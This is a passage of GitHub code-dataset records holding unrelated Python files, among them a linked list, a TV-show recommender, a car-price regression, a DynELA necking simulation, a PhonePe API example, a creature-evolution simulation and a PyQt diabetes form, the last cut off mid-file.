dividend\")\n parser.add_argument('--onlywithask', action=\"store_true\", help=\"use this flag to filter securities with ask price\")\n parser.add_argument('--maxspreadrel', action=\"store\", help=\"use this flag to filter securities with relative spread lower than maxspread %\")\n parser.add_argument('--currency', action=\"store\", help=\"use this flag to select a currency (BTC, LTC, DVC...)\")\n parser.add_argument('--days', action=\"store\", help=\"use this flag to select days duration for dividend calculation\")\n parser.add_argument('--daysoffset', action=\"store\", help=\"use this flag to select days offset for dividend calculation\")\n args = parser.parse_args()\n \n args.basepath = os.path.dirname(__file__)\n \n stocks = CryptoStocksFilter(args)\n","repo_name":"c0indev3l/crypto-stocks-tools","sub_path":"cryptostocks/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13318,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39231267937","text":"class Node:\n \n ''' Class To create a node object for the linked list '''\n \n def __init__(self, item):\n ''' __init__ method to initialize the Node Object '''\n self.item = item\n self.next = None\n self.previous = None \n \n\nclass d_LinkedList:\n \n ''' Class to create a doubly linked list '''\n \n def __init__(self):\n \n ''' __init__ method to initialize the head of the linked-list '''\n \n self.head = None\n \n def push(self, item):\n \n ''' Method to perform a push operation on the linked-list '''\n \n newNode = Node(item)\n newNode.next = self.head\n if self.head is not None:\n self.head.prev = newNode\n self.head = newNode\n \n def __len__(self, node):\n \n ''' Method to get the number of elements in the linked list '''\n \n while node != None:\n counter += 1\n last = node\n node = node.next\n \n return counter\n \n def insert(self, item, prevNode):\n \n ''' Method to insert an element in the linked list '''\n \n if prevNode is None:\n return \n \n newNode = Node(item)\n prevNode.next = newNode\n newNode.prev = prevNode\n \n if newNode.next is not None:\n newNode.next.prev = newNode\n \n def getLis(self, node):\n \n ''' Method to print out the list '''\n \n while node is not None:\n print(node.data, end = ' ')\n last = node\n node = node.next\n \n def append(self, item,):\n \n ''' Method to append an element/item in the linked list '''\n \n newNode = Node(item)\n newNode.next = None\n \n if self.head == None:\n newNode.prev, self.head = None, newNode\n \n last = self.head\n \n while last.next != None:\n last = last.next\n \n last.next = newNode\n newNode.prev = last\n return \n","repo_name":"fermihacker/DataStructures","sub_path":"ClassFiles/Doubly_Linked_List.py","file_name":"Doubly_Linked_List.py","file_ext":"py","file_size_in_byte":2084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72234738728","text":"# Collaborative Filtering\nimport numpy as np\nimport pandas as pd\n\ndf = pd.read_csv('ratingUser.csv',delimiter=',',index_col=0,)\ndf.fillna(0,inplace=True)\nprint(df)\n\n# Correlation\n'''\npearson : standard correlation coefficient\nkendall : Kendall Tau correlation coefficient\nspearman : Spearman correlation coefficient\n'''\ndfCorr = df.corr() # default:pearson\n# print(df_corr)\n\n# testing\npreferensiSaya = [\n ('kartun_a',4),\n ('sinetron_b',1)\n]\n\nskor_sama = pd.DataFrame()\nfor produk, rating in preferensiSaya:\n skor = dfCorr[produk] * (rating-2.5) # standarisasi dengan nilai 
median value of 2.5, since a neutral rating is 2.5\n    skor = skor.sort_values(ascending = False) # sort the extracted data series from largest to smallest\n    skor_sama = skor_sama.append(skor,ignore_index=False) # collect everything into a single dataframe\n    print(skor_sama)\n    \nprint(skor_sama.sum().sort_values(ascending=False)) # sum the correlation scores from both inputs and display them as a recommendation ranking\nmixRating=skor_sama.sum().sort_values(ascending=False)\nprint(mixRating[mixRating.values>0].index.values) # recommend only items whose correlation score is above 0\nacaraRecommend=mixRating[mixRating.values>0].index.values\nfor i in range(0,len(preferensiSaya)):\n    acaraRecommend=acaraRecommend[acaraRecommend!=preferensiSaya[i][0]] # recommend only shows that have not been watched yet\nprint('Acara TV yang mungkin anda suka adalah:',', '.join(acaraRecommend))","repo_name":"agammsantos/Data-Science-Class-Purwadhika","sub_path":"pertemuan46/pertemuan46collab.py","file_name":"pertemuan46collab.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29171781644","text":"import numpy as np\nimport pandas as pd\nfrom pandas import Series, DataFrame\n\n#Selecting and retrieving data\nseries_obj = Series(np.arange(8), index=['row 1', 'row 2', 'row 3', 'row 4', 'row 5', 'row 6', 'row 7', 'row 8'])\n\nseries_obj\nseries_obj['row 7']\nseries_obj[[0,4]]\n\nnp.random.seed(5)\nDF_obj = DataFrame(np.random.rand(36).reshape((6,6)), index=['row 1', 'row 2', 'row 3', 'row 4', 'row 5', 'row 6'],\n                   columns=['column1', 'column2', 'column3', 'column4', 'column5', 'column6'])\nDF_obj\n\nDF_obj.iloc[[0, 2], DF_obj.columns.get_indexer(['column2', 'column3'])]","repo_name":"stephengequt/IFN645-Pancake","sub_path":"Stephen/Ex_Files_Python_Data_Science_EssT/Prac/01.py","file_name":"01.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34335279748","text":"import pandas as pd\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.model_selection import train_test_split\r\nimport seaborn as sns\r\nfrom sklearn import linear_model as lm\r\n\r\ndf=pd.read_csv(r\"C:\\Codes\\Python\\Data\\CarPrice_Assignment_modified.csv\") #Path of Car Dataset\r\nprint(\"PROVIDED DATASET AFTER CLEANING\\n\\n\",df.head(10),\"\\n\\n\")\r\n\r\nx_train, x_test, y_train, y_test = train_test_split(df[['symboling','fueltype','aspiration','doornumber','carbody','drivewheel','enginelocation','wheelbase',\r\n                                                         'enginesize','boreratio','stroke','compressionratio','horsepower','peakrpm','citympg','highwaympg']],\r\n                                                    df[['price']],test_size=0.25)\r\n\r\nreg=lm.LinearRegression()\r\nreg.fit(x_train,y_train)\r\n\r\ny_predict=reg.predict(x_test)\r\n\r\nsns.regplot(x = y_test, y = y_predict, scatter_kws = {\"color\": \"blue\"}, line_kws={\"color\": \"red\" }, ci=0)\r\nsns.set_style(\"white\")\r\nprint(\"\\n\\nRegression Plot -\")\r\nplt.xlabel('Truth', color='white')\r\nplt.ylabel('Predicted', color='white')\r\nplt.show()\r\nprint(\"\\n\\nAccuracy= \",(round(reg.score(x_test,y_test)*100,2)),\"%\\n\\n\")\r\n\r\ncorrelation=df.corr()\r\nplt.figure(figsize=(10,10))\r\nprint(\"\\n\\nCorrelation 
-\")\r\nsns.heatmap(correlation,cbar=True,square=True,fmt='.1f',annot=True,annot_kws={'size':8},cmap='BrBG')\r\n\r\nplt.show()\r\n","repo_name":"TheROCKoManz/Car-Price-Prediction-using-Linear-Regression","sub_path":"Car_Price_Prediction_Linear_Regression.py","file_name":"Car_Price_Prediction_Linear_Regression.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"18715455737","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 22 09:43:44 2018\n\n@author: pantale\n\"\"\"\n\nimport dnlPython as dnl\n\n# Parameters of the model\nnbreSaves = 20\nstopTime = 1e-3\nnbrePoints = 1000 \nbottomWidth = 6.35\ntopWidth = 6.413\nheigh = 26.67\nnbElementsWidth = 10\nnbElementsHeigh = 40\nfactor = 1 / 2\ndisplacement = 7\n\n# Material parameters\nyoung = 206000\npoisson = 0.3\ndensity = 7.83e-09\nheatCapacity = 4.6e+08\ntaylorQuinney = 0.9\nA = 806.0\nB = 614.0\nC = 0.0089\nn = 0.168\nm = 1.1\ndepsp0 = 1.0\nTm = 1540.0\nT0 = 20.0\n\ndxWidth = bottomWidth / nbElementsWidth\ndxHeigh = heigh / nbElementsHeigh\nddx = (topWidth - bottomWidth) / bottomWidth / heigh\nspeed = displacement / stopTime\n\n# Creates the main Object\nmodel = dnl.DynELA(\"BarNecking\")\n\n# Creates the Nodes\nnbNodes = 1\nnsAll = dnl.NodeSet(\"NS_All\")\ndxHeigh /= (1 / factor + 1) / 2\ny = 0\nfor j in range (nbElementsHeigh + 1): \n for i in range (nbElementsWidth + 1):\n model.createNode(nbNodes, i * dxWidth * (1 + ddx * y), y, 0)\n model.add(nsAll, nbNodes)\n nbNodes += 1\n if (j == nbElementsHeigh/2): dxHeigh /= factor\n y += dxHeigh\nnbNodes -= 1\nprint(\"Number of nodes created:\", model.getNodesNumber()) \n\n# Creates the Elements\nmodel.setDefaultElement(dnl.Element.ElQua4NAx)\nnbElements = 1\nesAll = dnl.ElementSet(\"ES_All\")\nfor j in range (nbElementsHeigh):\n for i in range (nbElementsWidth):\n n1 = (i + (j * (nbElementsWidth + 1)) + 1)\n n2 = (i + (j * (nbElementsWidth + 1)) + 2)\n n3 = (i + ((j + 1) * (nbElementsWidth + 1)) + 2)\n n4 = (i + ((j + 1) * (nbElementsWidth + 1)) + 1)\n model.createElement(nbElements, n1, n2, n3, n4)\n model.add(esAll, nbElements)\n nbElements += 1\nnbElements -= 1\nprint(\"Number of elements created:\", model.getElementsNumber()) \n\ntopNS = dnl.NodeSet(\"NS_Top\")\nmodel.add(topNS, nbNodes-nbElementsWidth, nbNodes)\n\nbottomNS = dnl.NodeSet(\"NS_Bottom\")\nmodel.add(bottomNS, 1, nbElementsWidth + 1)\n\naxisNS = dnl.NodeSet(\"NS_Axis\")\nmodel.add(axisNS, 1, nbNodes, nbElementsWidth + 1)\n\nhistRad = dnl.NodeSet(\"NS_HistRadius\")\nmodel.add(histRad, 1 + nbElementsWidth)\n\nhistES = dnl.ElementSet(\"ES_Hist\")\nmodel.add(histES, 1)\n\n# Creates the hardening law\nhardLaw = dnl.JohnsonCookLaw()\nhardLaw.setParameters(A, B, C, n, m, depsp0, Tm, T0)\n\n# Creates the material\nsteel = dnl.Material(\"Steel\")\nsteel.setHardeningLaw(hardLaw)\nsteel.youngModulus = young\nsteel.poissonRatio = poisson\nsteel.density = density\nsteel.heatCapacity = heatCapacity\nsteel.taylorQuinney = taylorQuinney\nsteel.initialTemperature = T0\n\n# Finaly link the material to the structure\nmodel.add(steel, esAll)\n\n# Declaration of a boundary condition for bottom line\nbottomBC = dnl.BoundaryRestrain('BC_bottom')\nbottomBC.setValue(0, 1, 1)\nmodel.attachConstantBC(bottomBC, bottomNS)\n\n# Declaration of a boundary condition for axis line\naxisBC = dnl.BoundaryRestrain('BC_axis')\naxisBC.setValue(1, 0, 1)\nmodel.attachConstantBC(axisBC, axisNS)\n\n# Declaration of a ramp function to 
apply the load\nramp = dnl.RampFunction(\"constantFunction\")\nramp.setFunction(dnl.RampFunction.Constant, 0, stopTime)\n\n# Declaration of a boundary condition for top line\nspeedBC = dnl.BoundarySpeed('BC_speed')\nspeedBC.setValue(0, displacement, 0)\nspeedBC.setFunction(ramp)\nmodel.attachConstantBC(speedBC, topNS)\n\nsolver = dnl.Explicit(\"Solver\")\nsolver.setTimes(0, stopTime)\nmodel.add(solver)\nsolver.setTimeStepMethod(solver.PowerIteration)\n#solver.setTimeStepSafetyFactor(0.6)\nmodel.setSaveTimes(0, stopTime, stopTime / nbreSaves)\n\n# Declaration of the history files\nvonMisesHist = dnl.HistoryFile(\"vonMisesHistory\")\nvonMisesHist.setFileName(dnl.String(\"vonMises.plot\"))\nvonMisesHist.add(histES, 0, dnl.Field.vonMises)\nvonMisesHist.setSaveTime(stopTime / nbrePoints)\nmodel.add(vonMisesHist)\n\nplasticStrainHist = dnl.HistoryFile(\"plasticStrainHistory\")\nplasticStrainHist.setFileName(dnl.String(\"plasticStrain.plot\"))\nplasticStrainHist.add(histES, 0, dnl.Field.plasticStrain)\nplasticStrainHist.setSaveTime(stopTime / nbrePoints)\nmodel.add(plasticStrainHist)\n\ntemperatureHist = dnl.HistoryFile(\"temperatureHistory\")\ntemperatureHist.setFileName(dnl.String(\"temperature.plot\"))\ntemperatureHist.add(histES, 0, dnl.Field.temperature)\ntemperatureHist.setSaveTime(stopTime / nbrePoints)\nmodel.add(temperatureHist)\n\ninternalEnergyHist = dnl.HistoryFile(\"internalEnergyHistory\")\ninternalEnergyHist.setFileName(dnl.String(\"internalEnergy.plot\"))\ninternalEnergyHist.add(histES, 0, dnl.Field.internalEnergy)\ninternalEnergyHist.setSaveTime(stopTime / nbrePoints)\nmodel.add(internalEnergyHist)\n\nradiusHist = dnl.HistoryFile(\"radiusHistory\")\nradiusHist.setFileName(dnl.String(\"radius.plot\"))\nradiusHist.add(histRad, dnl.Field.nodeCoordinateX)\nradiusHist.setSaveTime(stopTime / nbrePoints)\nmodel.add(radiusHist)\n\ndtHist = dnl.HistoryFile(\"dtHistory\")\ndtHist.setFileName(dnl.String(\"dt.plot\"))\ndtHist.add(dnl.Field.timeStep)\ndtHist.setSaveTime(stopTime / nbrePoints)\nmodel.add(dtHist)\n\nkeHist = dnl.HistoryFile(\"keHistory\")\nkeHist.setFileName(dnl.String(\"ke.plot\"))\nkeHist.add(dnl.Field.kineticEnergy)\nkeHist.setSaveTime(stopTime / nbrePoints)\nmodel.add(keHist)\n\n# Parallel computation\nmodel.parallel.setCores(4)\n\nmodel.solve()\n\nsvg = dnl.SvgInterface(\"SVG\")\nsvg.setTitleDisplay(False)\nsvg.setLegendPosition(350, 150)\nsvg.write(dnl.String(\"temperatureCP.svg\"),dnl.Field.temperature)\nsvg.write(dnl.String(\"vonMisesCP.svg\"),dnl.Field.vonMises)\n\n# Plot the results as curves\nimport dnlCurves as cu\ncurves = cu.Curves()\ncurves.plotFile('Curves.ex')\n","repo_name":"pantale/DynELA-v3.0","sub_path":"Samples/BarNecking/BarNecking-Axi/BarNecking.py","file_name":"BarNecking.py","file_ext":"py","file_size_in_byte":5531,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"29999841715","text":"import datetime\r\nimport json\r\nimport phonepe_api\r\n\r\nenv = 'UAT' # Choose the environment first between UAT / Production\r\n\r\nphonepe_api.set_environment(env) # Possible values are UAT or PROD\r\n\r\n\"\"\" Your credentials go here. 
\r\nYou can get the UAT credentials from here : \r\nhttps://developer.phonepe.com/docs/test-credentials\r\nYou can get the production credentials by following the link below :\r\nhttps://developer.phonepe.com/docs/merchant-onboarding\r\n\"\"\"\r\n\r\nphonepe_api.MERCHANT_ID = 'Merchantid'\r\nphonepe_api.STORE_ID = 'test_store'\r\nphonepe_api.TERMINAL_ID = 'test_terminal'\r\n\r\napi_keys = {\r\n '1': 'key1',\r\n '2': 'key2'\r\n}\r\n\r\nphonepe_api.API_KEYS.update(api_keys)\r\n\r\ncustomer_mobile_number = '1234567890'\r\nsalt_key_index = '1'\r\nnew_transaction_id = datetime.datetime.now().strftime(\"%Y%m%d%H%M%S\") # Setting the current date and time as orderId, for example\r\n\r\nresponse = phonepe_api.make_qrinit_request(100, new_transaction_id, salt_key_index)\r\n#response = phonepe_api.make_charge_request(100, new_transaction_id, customer_mobile_number, salt_key_index)\r\n#response_content = json.loads(response.content)\r\n#if response_content['success'] is True:\r\n# providerReferenceId = json.loads(response.content)['data']['providerReferenceId']\r\n\r\n#response = phonepe_api.make_status_request(new_transaction_id, salt_key_index)\r\n\r\n#response = phonepe_api.make_cancel_request(new_transaction_id,salt_key_index)\r\n#response = phonepe_api.make_refund_request(new_transaction_id, providerReferenceId, salt_key_index)\r\n#response = phonepe_api.make_status_request(new_transaction_id, salt_key_index)\r\n","repo_name":"ankitdaf/phonepe_api_examples","sub_path":"Python/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"13082942813","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport random\nfrom matplotlib import animation\nimport statistics as stat\nimport csv\nimport pandas as pd\nfrom keras.models import Sequential\nfrom keras.layers import Dense\n\n\n\ndef create_brain():\n # Define your neural network model here\n model = Sequential()\n model.add(Dense(5, input_dim=4, activation='relu'))\n model.add(Dense(2, activation='linear'))\n return model\n\nclass Creature:\n def __init__(self, x, y, speed, movement_type, energy=100, map_width=100, map_height=100, brain=None):\n self.x = x\n self.y = y\n #self.speed = speed\n self.speed = Gene(speed, 0.1, 0.1)\n self.movement_type = movement_type\n self.energy = energy\n self.map_width = map_width\n self.map_height = map_height\n self.dead = False\n self.age = 0\n self.hasTarget = False\n self.target = []\n\n\n # Create a brain if none is provided\n if brain is None:\n self.brain = create_brain()\n else:\n self.brain = brain\n\n def observe(self, food):\n # Your logic to observe food here\n pass\n\n\n def decide_movement(self, food):\n # Your logic to decide movement here\n \n # The input to the brain should be a 1D array with 4 elements,\n # representing the x and y positions of the creature and the food\n brain_input = np.array([self.x, self.y, food.x, food.y]) # fill in with the actual values\n\n # The output of the brain is a 1D array with 2 elements,\n # representing the desired x and y components of the creature's movement\n target = self.brain.predict(np.array([brain_input]),verbose=0)[0] # note the extra [] around brain_input\n self.hasTarget = True\n\n return target\n\n pass\n\n def decide_direction(self, target):\n\n target_theta = np.arctan2(target[1]-self.y, target[0]-self.x)\n target_distance = np.sqrt((target[1]-self.y)**2 + (target[0]-self.x)**2)\n return target_theta, 
target_distance\n\n\n def rand_move(self):\n if self.movement_type == 'linear':\n \n self.x = self.x + np.random.uniform(-self.speed.value, self.speed.value)\n self.y = self.y + np.random.uniform(-self.speed.value, self.speed.value)\n \n elif self.movement_type == 'angular':\n angle = np.random.uniform(0, 2 * np.pi)\n \n self.x += self.speed.value * np.cos(angle)\n self.y += self.speed.value * np.sin(angle)\n \n # Keep creature within bounds\n self.x = max(0, min(self.x, self.map_width))\n self.y = max(0, min(self.y, self.map_height))\n\n self.energy -= 1\n if self.energy <= 0:\n self.dead = True\n\n def intentional_move(self, target_theta, target_distance):\n self.x = self.x + self.speed.value * np.cos(target_theta)\n self.y = self.y + self.speed.value * np.sin(target_theta)\n \n # Keep creature within bounds\n self.x = max(0, min(self.x, self.map_width))\n self.y = max(0, min(self.y, self.map_height))\n\n self.energy -= 1\n if self.energy <= 0:\n self.dead = True\n\n def eat(self, food):\n # Your logic to eat food and gain energy here\n target = self.decide_movement(food)\n targ_theta, targ_dist = self.decide_direction(target)\n self.intentional_move(targ_theta, targ_dist)\n\n pass\n\n def reproduce(self):\n # Your logic to reproduce and split into two here\n pass\n\n def mutate(self):\n # Call gene mutation functions\n self.speed.mutate()\n pass\n\n\nclass Food:\n def __init__(self, x, y, energy=20):\n self.x = x\n self.y = y\n self.energy = energy\n\nclass Gene:\n def __init__(self, value, mutation_rate, mutation_probability):\n self.value = value\n self.mutation_rate = mutation_rate\n self.mutation_probability = mutation_probability\n # print(\"in gene\")\n # print(self.value)\n\n def mutate(self):\n if np.random.choice([True, False], p=[self.mutation_probability, 1-self.mutation_probability]):\n self.value += np.random.normal(scale=(self.value * self.mutation_rate))\n # print(\"Mutated, Value: \" + str(self.value))\n\nclass Simulation:\n #def __init__(self, width, height, num_creatures, num_food, ticks, generations):\n def __init__(self, width, height, initial_food, initial_creatures, food_energy, creature_speed_variance,\n food_spawn_rate, ticks, generations, max_food,creature_avg_speed,eat_radius,see_radius, plot, write_csv, csv_loc):\n self.width = width\n self.height = height\n self.creatures = []\n self.food = []\n self.ticks = ticks\n self.generations = generations\n self.current_tick = 0\n self.current_generation = 1\n self.max_food = max_food # Maximum amount of food that can be present in the map \n self.food_energy = food_energy # Energy that each food gives to a creature\n self.food_spawn_rate = food_spawn_rate # How often food spawns in ticks\n self.total_tick = 0 # Total ticks that have passed\n self.creature_avg_speed = creature_avg_speed # Average speed of creatures\n self.eat_radius = eat_radius # Radius in which creatures can eat food\n self.see_radius = see_radius # Radius in which creatures can see food\n\n self.plotAnimation = plot # Boolean to determine whether to plot animation or not\n self.write_csv = write_csv # Boolean to determine whether to write to csv or not\n self.csv_loc = csv_loc # Location of csv file to write to\n self.writtenwaiter = False # Boolean to make sure it writes only once\n \n\n self.meanspeed = [] # mean value of speeds of creatures in the simulation\n self.pop_stats = [] # List to store population count\n self.food_stats = [] # List to store food count\n self.tick_stats = [] # List to store tick count\n\n for _ in 
range(initial_creatures):\n creature = Creature(np.random.uniform(0, self.width), np.random.uniform(0, self.height), \n np.random.uniform(creature_avg_speed-(creature_speed_variance/2), creature_avg_speed+(creature_speed_variance/2)), random.choice(['linear', 'angular']),\n map_width=self.width, map_height=self.height)\n\n self.creatures.append(creature)\n\n for _ in range(initial_food):\n food = Food(np.random.uniform(0, self.width), np.random.uniform(0, self.height))\n self.food.append(food)\n\n def run(self):\n #fig, ax = plt.subplots()\n fig, (ax1, ax2) = plt.subplots(1, 2)\n ax3 = ax2.twinx()\n ax4 = ax2.twinx()\n #fig2, ax2 = plt.subplots()\n ax2.set_xlabel(\"Time (ticks)\")\n ax2.set_ylabel(\"Count\")\n ax2.set_title(\"Population and Food over Time\")\n\n pop_line, = ax2.plot([], [], label='Population')\n food_line, = ax2.plot([], [], label='Food')\n ax2.legend()\n\n def animate(i):\n ax1.clear()\n ax2.clear()\n ax3.clear()\n ax4.clear()\n\n self.current_tick += 1\n if self.current_tick > self.ticks:\n self.current_tick = 0\n self.current_generation += 1\n\n new_creatures = []\n \n for creature in self.creatures:\n \n if (creature.age != 0) & (creature.hasTarget == False):\n creature.rand_move()\n\n # Check if creature is near food\n for food in self.food:\n distance = np.sqrt((creature.x - food.x)**2 + (creature.y - food.y)**2)\n\n # Check if the creature can see the food\n if distance < self.see_radius:\n creature.eat(food)\n\n\n # If creature is near food, it eats it and gains energy\n if distance < self.eat_radius: # You can adjust this value as needed\n creature.energy += food.energy\n creature.hasTarget = False\n self.food.remove(food) # Remove food from simulation\n\n # Your logic here to reproduce\n # Check if creature has enough energy to reproduce\n if creature.energy >= 150:\n # Create a new creature at the same location\n offspring = Creature(creature.x, creature.y, creature.speed.value, creature.movement_type, energy=75, map_width=self.width, map_height=self.height)\n offspring.mutate()\n # print(\"Born\")\n # print(offspring.speed.value)\n new_creatures.append(offspring)\n\n # Divide energy between parent and offspring\n creature.energy = 75\n \n creature.age += 1\n \n # Add the new creatures to the simulation\n self.creatures.extend(new_creatures)\n\n \n\n # Also handle mutation here\n\n # Remove dead creatures\n self.creatures = [creature for creature in self.creatures if not creature.dead] \n\n # Add your logic here to spawn food every n ticks\n\n # Spawn food every n ticks, up to maximum amount\n if self.current_tick % self.food_spawn_rate == 0 and len(self.food) < self.max_food:\n self.food.append(Food(np.random.uniform(0, self.width), np.random.uniform(0, self.height), self.food_energy))\n\n creature_x = [creature.x for creature in self.creatures]\n creature_y = [creature.y for creature in self.creatures]\n ax1.scatter(creature_x, creature_y, c='blue')\n\n # Record stats\n self.total_tick += 1\n\n self.meanspeed.append(stat.mean([obj.speed.value for obj in self.creatures]))\n self.tick_stats.append(self.total_tick)\n self.pop_stats.append(len(self.creatures))\n self.food_stats.append(len(self.food))\n\n # Write out stats every 1000 ticks\n\n \n if self.plotAnimation:\n # annotate the energy levels\n for creature in self.creatures:\n ax1.annotate(f\"{creature.energy:.1f}\", (creature.x, creature.y))\n\n food_x = [food.x for food in self.food]\n food_y = [food.y for food in self.food]\n ax1.scatter(food_x, food_y, c='red')\n\n ax1.set_title(f\"Epoch: 
{self.current_generation}, Tick: {self.current_tick}, Population: {len(self.creatures)}, Food: {len(self.food)}\")\n\n ax1.set_xlim(0, self.width)\n ax1.set_ylim(0, self.height)\n\n # Only plot the last 1000 data points if available\n if len(simulation.tick_stats) >= 10:\n plothist = min(self.total_tick,1000)\n ax2.plot(self.tick_stats[-plothist:], self.pop_stats[-plothist:], label='Population')\n ax3.plot(self.tick_stats[-plothist:], self.food_stats[-plothist:], label='Food', color='red')\n ax4.plot(self.tick_stats[-plothist:], self.meanspeed[-plothist:], label='meanSpeed', color = 'green')\n \n #show y labels\n ax2.set_ylabel(\"Population\")\n ax3.set_ylabel(\"Food\")\n\n #set y axis color\n ax2.tick_params(axis='y', colors='blue')\n ax3.tick_params(axis='y', colors='red')\n ax4.tick_params(axis='y', colors='green')\n\n ax2.set_ylim(0, max(self.pop_stats)+2)\n ax3.set_ylim(0, max(self.food_stats)+2)\n\n \n if self.total_tick % 1000 == 50:\n self.writtenwaiter = False\n\n if self.write_csv & (self.total_tick % 1000 == 0) & (not self.writtenwaiter):\n data = {\n \"tick\": self.tick_stats[-1000:],\n \"population\": self.pop_stats[-1000:],\n \"food\": self.food_stats[-1000:],\n \"meanSpeed\": self.meanspeed[-1000:]}\n df = pd.DataFrame(data)\n print(self.total_tick,self.total_tick % 1000)\n if self.total_tick == 1:\n print(\"Initialising CSV\")\n df.to_csv(f\"{self.csv_loc}/output.csv\", index=False , header=True)\n else:\n # print(\"Writing CSV\")\n df.to_csv(f\"{self.csv_loc}/output.csv\", mode='a', header=False, index=False)\n self.writtenwaiter = True\n\n\n if self.plotAnimation:\n ani = animation.FuncAnimation(fig, animate, frames=self.ticks*self.generations, interval=10)\n # set the window size for the animation\n fig.set_size_inches(20, 10)\n \n plt.show()\n\n \n\n\nsimulation = Simulation(\n width=100,\n height=100,\n initial_food=50,\n initial_creatures=5,\n food_energy=30,\n creature_avg_speed=15,\n creature_speed_variance=1,\n food_spawn_rate=1,\n ticks=100,\n generations=10,\n max_food=100,\n eat_radius=10,\n see_radius=50,\n plot = True,\n write_csv = True,\n csv_loc = \"D:/Simulations/outputs\"\n)\n\nsimulation.run()","repo_name":"shrihari256/evolving-simple-organisms","sub_path":"GPTgen/gptCode_Neural.py","file_name":"gptCode_Neural.py","file_ext":"py","file_size_in_byte":13449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"3349266475","text":"from django.urls import path\nfrom . 
import views\n\n\n\nurlpatterns = [\npath(\"\", views.home, name=\"home\"),\npath(\"create/\", views.create, name=\"create\"),\npath(\"/\", views.index, name=\"index\"),\npath(\"insertion/\", views.insertion,name=\"insertion\"),\npath(\"history/\", views.history,name=\"history\"),\npath(\"user/\", views.user,name=\"user\"),\npath(\"update/\", views.update,name=\"update\"),\n]\n\n# path(\"\", views.button),\n# path(\"switch/\", views.switch,name=\"switch\"),\n# path(\"pause/\", views.pauseinsertion,name=\"pause\"),\n# path(\"\", views.runmonitor)\n# url(r'^$', views.cur_time, name='time'),\n","repo_name":"yifanshi127/E-health-app","sub_path":"mysite/ehealth/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"41141493469","text":"import pandas as pd\nfrom sklearn.model_selection import train_test_split\nimport sys\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QLabel, QLineEdit, QPushButton, QMessageBox, QVBoxLayout, QWidget\n\n\ndef read_csv_dataset(filename, target_column, test_size=0.15, random_state=2):\n # Read the CSV file into a pandas DataFrame\n df = pd.read_csv(filename)\n\n # Separate features and target variable\n X = df.drop(target_column, axis=1)\n y = df[target_column]\n\n # Split the dataset into training and testing sets\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=test_size, random_state=random_state)\n\n # Convert DataFrame to lists\n X_train = X_train.values.tolist()\n X_test = X_test.values.tolist()\n y_train = y_train.tolist()\n y_test = y_test.tolist()\n\n # Return the training and testing sets as lists\n return X_train, X_test, y_train, y_test\n\n\n\nclass DiabetesPredictionWindow(QMainWindow):\n def __init__(self):\n super().__init__()\n\n self.setWindowTitle(\"Diabetes Prediction\")\n self.setGeometry(100, 100, 300, 300)\n\n # Create input labels and fields\n self.pregnancies_label = QLabel(\"Pregnancies:\")\n self.pregnancies_input = QLineEdit()\n\n self.glucose_label = QLabel(\"Glucose:\")\n self.glucose_input = QLineEdit()\n\n self.blood_pressure_label = QLabel(\"Blood Pressure:\")\n self.blood_pressure_input = QLineEdit()\n\n self.skin_thickness_label = QLabel(\"Skin Thickness:\")\n self.skin_thickness_input = QLineEdit()\n\n self.insulin_label = QLabel(\"Insulin:\")\n self.insulin_input = QLineEdit()\n\n self.bmi_label = QLabel(\"BMI:\")\n self.bmi_input = QLineEdit()\n\n self.diabetes_pedigree_label = QLabel(\"Diabetes Pedigree:\")\n self.diabetes_pedigree_input = QLineEdit()\n\n self.age_label = QLabel(\"Age:\")\n self.age_input = QLineEdit()\n\n # Create predict button\n self.predict_button = QPushButton(\"Predict\")\n self.predict_button.clicked.connect(self.predict)\n\n # Create layout and add input elements\n layout = QVBoxLayout()\n layout.addWidget(self.pregnancies_label)\n layout.addWidget(self.pregnancies_input)\n layout.addWidget(self.glucose_label)\n layout.addWidget(self.glucose_input)\n layout.addWidget(self.blood_pressure_label)\n layout.addWidget(self.blood_pressure_input)\n layout.addWidget(self.skin_thickness_label)\n layout.addWidget(self.skin_thickness_input)\n layout.addWidget(self.insulin_label)\n layout.addWidget(self.insulin_input)\n layout.addWidget(self.bmi_label)\n layout.addWidget(self.bmi_input)\n layout.addWidget(self.diabetes_pedigree_label)\n layout.addWidget(self.diabetes_pedigree_input)\n layout.addWidget(self.age_label)\n layout.addWidget(self.age_input)\n 
